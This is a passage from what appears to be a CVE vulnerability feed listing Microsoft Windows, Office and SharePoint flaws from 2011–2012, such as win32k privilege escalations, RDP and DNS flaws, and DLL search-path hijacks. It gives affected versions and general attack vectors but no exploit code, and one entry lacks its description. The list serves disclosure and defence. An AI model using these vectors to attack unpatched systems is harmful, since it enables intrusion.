condition in partmgr.sys in Windows Partition Manager in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that makes multiple simultaneous Plug and Play (PnP) Configuration Manager function calls, aka "Plug and Play (PnP) Configuration Manager Vulnerability." [CVE-2012-0176] Double free vulnerability in Microsoft Silverlight 4 before 4.1.10329 on Windows allows remote attackers to execute arbitrary code via vectors involving crafted XAML glyphs, aka "Silverlight Double-Free Vulnerability." [CVE-2012-0175] The Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted name for a (1) file or (2) directory, aka "Command Injection Vulnerability." [CVE-2012-0174] Windows Firewall in tcpip.sys in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly enforce firewall rules for outbound broadcast packets, which allows remote attackers to obtain potentially sensitive information by observing broadcast traffic on a local network, aka "Windows Firewall Bypass Vulnerability." [CVE-2012-0173] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability," a different vulnerability than CVE-2012-0002. [CVE-2012-0165] GDI+ in Microsoft Windows Vista SP2 and Server 2008 SP2 and Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 does not properly validate record types in EMF images, which allows remote attackers to execute arbitrary code via a crafted image, aka "GDI+ Record Type Vulnerability." [CVE-2012-0164] Microsoft .NET Framework 4 does not properly compare index values, which allows remote attackers to cause a denial of service (application hang) via crafted requests to a Windows Presentation Foundation (WPF) application, aka ".NET Framework Index Comparison Vulnerability." [CVE-2012-0159] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview [CVE-2012-0157] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle window messaging, which allows local users to gain privileges via a crafted application that calls the PostMessage function, aka "PostMessage Function Vulnerability." [CVE-2012-0156] DirectWrite in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly render Unicode characters, which allows remote attackers to cause a denial of service (application hang) via a (1) instant message or (2) web site, aka "DirectWrite Application Denial of Service Vulnerability." [CVE-2012-0154] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers keyboard layout errors, aka "Keyboard Layout Use After Free Vulnerability." [CVE-2012-0152] The Remote Desktop Protocol (RDP) service in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (application hang) via a series of crafted packets, aka "Terminal Server Denial of Service Vulnerability." [CVE-2012-0151] The Authenticode Signature Verification function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly validate the digest of a signed portable executable (PE) file, which allows user-assisted remote attackers to execute arbitrary code via a modified file with additional content, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2012-0150] Buffer overflow in msvcrt.dll in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, aka "Msvcrt.dll Buffer Overflow Vulnerability." [CVE-2012-0149] afd.sys in the Ancillary Function Driver in Microsoft Windows Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2012-0148] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "AfdPoll Elevation of Privilege Vulnerability." [CVE-2012-0013] Incomplete blacklist vulnerability in the Windows Packager configuration in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted ClickOnce application in a Microsoft Office document, related to .application files, aka "Assembly Execution Vulnerability." [CVE-2012-0009] Untrusted search path vulnerability in the Windows Object Packager configuration in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse executable file in the current working directory, as demonstrated by a directory that contains a file with an embedded packaged object, aka "Object Packager Insecure Executable Launching Vulnerability." [CVE-2012-0006] The DNS server in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 does not properly handle objects in memory during record lookup, which allows remote attackers to cause a denial of service (daemon restart) via a crafted query, aka "DNS Denial of Service Vulnerability." [CVE-2012-0005] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2, when a Chinese, Japanese, or Korean system locale is used, can access uninitialized memory during the processing of Unicode characters, which allows local users to gain privileges via a crafted application, aka "CSRSS Elevation of Privilege Vulnerability." [CVE-2012-0004] Unspecified vulnerability in DirectShow in DirectX in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, related to Quartz.dll, Qdvd.dll, closed captioning, and the Line21 DirectShow filter, aka "DirectShow Remote Code Execution Vulnerability." [CVE-2012-0003] Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability." [CVE-2012-0002] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-0001] The kernel in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly load structured exception handling tables, which allows context-dependent attackers to bypass the SafeSEH security feature by leveraging a Visual C++ .NET 2003 application, aka "Windows Kernel SafeSEH Bypass Vulnerability." [CVE-2011-5046] The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability." [CVE-2011-4695] Unspecified vulnerability in Microsoft Windows 7 SP1, when Java is installed, allows local users to bypass Internet Explorer sandbox restrictions and gain privileges via unknown vectors, as demonstrated by the White Phosphorus wp_ie_sandbox_escape module for Immunity CANVAS. NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4434] Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 do not properly enforce AppLocker rules, which allows local users to bypass intended access restrictions via a (1) macro or (2) scripting feature in an application, as demonstrated by Microsoft Office applications and the SANDBOX_INERT and LOAD_IGNORE_CODE_AUTHZ_LEVEL flags. [CVE-2011-3408] Csrsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2011-3406] Buffer overflow in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote authenticated users to execute arbitrary code via a crafted query that leverages incorrect memory initialization, aka "Active Directory Buffer Overflow Vulnerability." [CVE-2011-3402] Unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page, as exploited in the wild in November 2011 by Duqu, aka "TrueType Font Parsing Vulnerability." [CVE-2011-3401] ENCDEC.DLL in Windows Media Player and Media Center in Microsoft Windows XP SP2 and SP3, Windows Vista SP2, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .dvr-ms file, aka "Windows Media Player DVR-MS Memory Corruption Vulnerability." [CVE-2011-3400] Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 do not properly handle OLE objects in memory, which allows remote attackers to execute arbitrary code via a crafted object in a file, aka "OLE Property Vulnerability." [CVE-2011-3397] The Microsoft Time component in DATIME.DLL in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted web site that leverages an unspecified "binary behavior" in Internet Explorer, aka "Microsoft Time Remote Code Execution Vulnerability." [CVE-2011-3389] The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. [CVE-2011-2019] Untrusted search path vulnerability in Microsoft Internet Explorer 9 on Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an HTML file, aka "Internet Explorer Insecure Library Loading Vulnerability." [CVE-2011-2018] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 does not properly initialize objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2011-2016] Untrusted search path vulnerability in Windows Mail and Windows Meeting Space in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .eml or .wcinv file, aka "Windows Mail Insecure Library Loading Vulnerability." [CVE-2011-2014] The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability." [CVE-2011-2013] Integer overflow in the TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code by sending a sequence of crafted UDP packets to a closed port, aka "Reference Counter Overflow Vulnerability." [CVE-2011-2011] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-2009] Untrusted search path vulnerability in Windows Media Center in Microsoft Windows Vista SP2 and Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista, allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Media Center Insecure Library Loading Vulnerability." [CVE-2011-2005] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-2004] Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a crafted TrueType font file, aka "TrueType Font Parsing Vulnerability," a different vulnerability than CVE-2011-3402. [CVE-2011-2003] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability." [CVE-2011-2002] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle TrueType fonts, which allows local users to cause a denial of service (system hang) via a crafted font file, aka "Win32k TrueType Font Type Translation Vulnerability." [CVE-2011-1991] Multiple untrusted search path vulnerabilities in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .rtf, or .txt file, related to (1) deskpan.dll in the Display Panning CPL Extension, (2) EAPHost Authenticator Service, (3) Folder Redirection, (4) HyperTerminal, (5) the Japanese Input Method Editor (IME), and (6) Microsoft Management Console (MMC), aka "Windows Components Insecure Library Loading Vulnerability." [CVE-2011-1985] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1984] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges by sending crafted packets over the loopback interface, aka "WINS Local Elevation of Privilege Vulnerability." [CVE-2011-1975] Untrusted search path vulnerability in the Data Access Tracing component in Windows Data Access Components (Windows DAC) 6.0 in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an Excel .xlsx file, aka "Data Access Components Insecure Library Loading Vulnerability." [CVE-2011-1974] NDISTAPI.sys in the NDISTAPI driver in Remote Access Service (RAS) in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "NDISTAPI Elevation of Privilege Vulnerability." [CVE-2011-1971] The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse file metadata, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Metadata Parsing DOS Vulnerability." [CVE-2011-1970] The DNS server in Microsoft Windows Server 2003 SP2 and Windows Server 2008 SP2, R2, and R2 SP1 does not properly initialize memory, which allows remote attackers to cause a denial of service (service outage) via a query for a nonexistent domain, aka "DNS Uninitialized Memory Corruption Vulnerability." [CVE-2011-1968] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly process packets in memory, which allows remote attackers to cause a denial of service (reboot) by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, as exploited in the wild in 2011, aka "Remote Desktop Protocol Vulnerability." [CVE-2011-1967] Winsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Vulnerability." [CVE-2011-1966] The DNS server in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 does not properly handle NAPTR queries that trigger recursive processing, which allows remote attackers to execute arbitrary code via a crafted query, aka "DNS NAPTR Query Vulnerability." [CVE-2011-1965] Tcpip.sys in the TCP/IP stack in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 does not properly implement URL-based QoS, which allows remote attackers to cause a denial of service (reboot) via a crafted URL to a web server, aka "TCP/IP QOS Denial of Service Vulnerability." [CVE-2011-1894] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for embedded content in an HTML document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted EMBED element in a web page that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-1893] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010, Windows SharePoint Services 2.0 and 3.0 SP2, and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "SharePoint XSS Vulnerability." [CVE-2011-1892] Microsoft Office Groove 2007 SP2, SharePoint Workspace 2010 Gold and SP1, Office Forms Server 2007 SP2, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Office Groove Data Bridge Server 2007 SP2, Office Groove Management Server 2007 SP2, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, and Office Web Apps 2010 Gold and SP1 do not properly handle Web Parts containing XML classes referencing external entities, which allows remote authenticated users to read arbitrary files via a crafted XML and XSL file, aka "SharePoint Remote File Disclosure Vulnerability." [CVE-2011-1891] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in a request to a script, aka "Contact Details Reflected XSS Vulnerability." [CVE-2011-1888] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1887] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1886] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 does not properly validate the arguments to functions, which allows local users to read arbitrary data from kernel memory via a crafted application that triggers a NULL pointer dereference, aka "Win32k Incorrect Parameter Validation Allows Information Disclosure Vulnerability." [CVE-2011-1885] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1884] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1883] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1882] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1881] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1880] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1879] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1878] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1877] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-1876] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1875] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1874] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1873] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate pointers during the parsing of OpenType (aka OTF) fonts, which allows remote attackers to execute arbitrary code via a crafted font file, aka "Win32k OTF Validation Vulnerability." [CVE-2011-1872] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, R2, and R2 SP1 allows guest OS users to cause a denial of service (host OS infinite loop) via malformed machine instructions in a VMBus packet, aka "VMBus Persistent DoS Vulnerability." [CVE-2011-1871] Tcpip.sys in the TCP/IP stack in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a series of crafted ICMP messages, aka "ICMP Denial of Service Vulnerability." [CVE-2011-1870] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutputString Vulnerability." [CVE-2011-1869] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote DFS servers to cause a denial of service (system hang) via a crafted referral response, aka "DFS Referral Response Vulnerability." [CVE-2011-1868] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate fields in DFS responses, which allows remote DFS servers to execute arbitrary code via a crafted response, aka "DFS Memory Corruption Vulnerability." [CVE-2011-1713] Microsoft msxml.dll, as used in Internet Explorer 8 on Windows 7, allows remote attackers to obtain potentially sensitive information about heap memory addresses via an XML document containing a call to the XSLT generate-id XPath function. NOTE: this might overlap CVE-2011-1202. [CVE-2011-1652] DISPUTED The default configuration of Microsoft Windows 7 immediately prefers a new IPv6 and DHCPv6 service over a currently used IPv4 and DHCPv4 service upon receipt of an IPv6 Router Advertisement (RA), and does not provide an option to ignore an unexpected RA, which allows remote attackers to conduct man-in-the-middle attacks on communication with external IPv4 servers via vectors involving RAs, a DHCPv6 server, and NAT-PT on the local network, aka a "SLAAC Attack." NOTE: it can be argued that preferring IPv6 complies with RFC 3484, and that attempting to determine the legitimacy of an RA is currently outside the scope of recommended behavior of host operating systems. [CVE-2011-1347] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to bypass Protected Mode and create arbitrary files by leveraging access to a Low integrity process, as demonstrated by Stephen Fewer as the third of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1346] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Stephen Fewer as the second of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1284] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutput Vulnerability." [CVE-2011-1283] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 does not ensure that an unspecified array index has a non-negative value before performing read and write operations, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleNumberOfCommand Vulnerability." [CVE-2011-1282] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly initialize memory and consequently uses a NULL pointer in an unspecified function call, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleLocalEUDC Vulnerability." [CVE-2011-1281] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 